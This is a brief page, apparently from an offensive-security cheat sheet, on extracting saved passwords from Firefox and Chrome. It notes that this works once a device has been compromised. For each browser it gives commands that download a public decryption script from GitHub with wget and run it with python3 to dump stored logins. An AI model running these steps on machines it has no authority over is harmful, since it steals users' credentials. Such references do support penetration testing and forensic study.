# Browser

## Extract Web Browser Passwords <a href="#extract-web-browser-passwords" id="extract-web-browser-passwords"></a>

Browser’s passwords may be retrieve easily if our device is compromised by decrypting login data.

### Firefox <a href="#firefox" id="firefox"></a>

```shellscript
wget https://raw.githubusercontent.com/unode/firefox_decrypt/main/firefox_decrypt.py
python3 firefox_decrypt.py
```

<br>

### Google Chrome <a href="#google-chrome" id="google-chrome"></a>

```shellscript
wget https://raw.githubusercontent.com/ohyicong/decrypt-chrome-passwords/main/decrypt_chrome_password.py
python3 decrypt_chrome_password.py
```
